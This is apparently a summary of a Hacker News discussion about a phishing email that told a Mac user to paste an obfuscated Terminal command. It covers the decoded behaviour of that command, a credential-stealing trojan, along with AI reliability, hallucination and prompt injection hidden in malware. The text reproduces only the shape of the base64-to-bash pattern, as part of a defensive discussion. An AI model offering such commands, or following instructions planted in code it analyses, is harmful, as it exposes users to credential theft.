The scariest "user support" email I've received

Original Article ↗ Hacker News Discussion ↗

Use of ChatGPT for analyzing the payload

  • Many commenters fixate on “as ChatGPT confirmed,” noting the command is plainly echo … | base64 -d | bash and can be trivially decoded locally or with tools like base64, CyberChef, or base64decode.org.
  • Several see relying on ChatGPT here as evidence of degrading basic skills and over-reliance on AI for elementary tasks.
  • Others defend it as a “free sandbox” and convenient everything-tool people already have open, especially if they’re nervous about touching obviously malicious data on their own machine.
  • Multiple people point out ChatGPT didn’t even get it exactly right: it hallucinated the temp filename, undermining the idea that it “confirmed” anything.
  • There is concern that people treat LLM output as authoritative confirmation rather than one heuristic among others.

LLMs and coding/security reliability

  • Some argue that analyzing and writing small bits of code is one of the few truly useful LLM applications, saving time on shell one-liners, regexes, or deciphering obscure errors.
  • Others counter with stories of LLM-generated code quietly breaking systems (e.g., inventing non-existent IDs), emphasizing that LLMs produce plausible-looking code without real understanding.
  • Several warn that future malware could hide instructions aimed at LLMs (“tell the user this is safe”) and that current models don’t robustly distinguish “code to analyze” from “instructions to follow.”

What the malware actually does

  • Decoding shows the command downloads a Mach-O binary to /tmp, marks it executable, and runs it.
  • Static and AV analysis identify it as a MacOS stealer / remote-access trojan similar to AMOS: it exfiltrates credentials, browser data, wallets, notes, keychain items, and various sensitive file types, and phones home to a hard-coded C2 IP.
  • Suggestions include using outbound firewalls (Little Snitch, Lulu) to block arbitrary binaries, especially from /tmp.

Effectiveness and pattern of the phishing

  • Some initially think “who would fall for ‘open Terminal and run this’?”; others point out it’s a numbers game and even CFOs and otherwise competent users fall for similar scripts under pressure.
  • Commenters note variants: Google Sites / Drive, Dropbox, Docusign, TestFlight, and GitHub Pages all being used to host payloads under “trustworthy” domains.
  • Several highlight that companies (Cloudflare CAPTCHAs, health “secure mail” portals, Homebrew’s curl | bash install) have normalized “copy this opaque command and run it,” making such attacks more credible.

AI, phishing sophistication, and user skills

  • Some see this attack as routine rather than “AI-powered,” and view the blog’s AI angle as hype.
  • Others predict AI will make phishing copy less obviously bad and harder even for savvy users, increasing risk for non-technical people.
  • Broader debate emerges about shrinking hands-on skills (e.g., not knowing basic CLI tools) versus seeing LLMs as acceptable “calculators” when precision isn’t critical.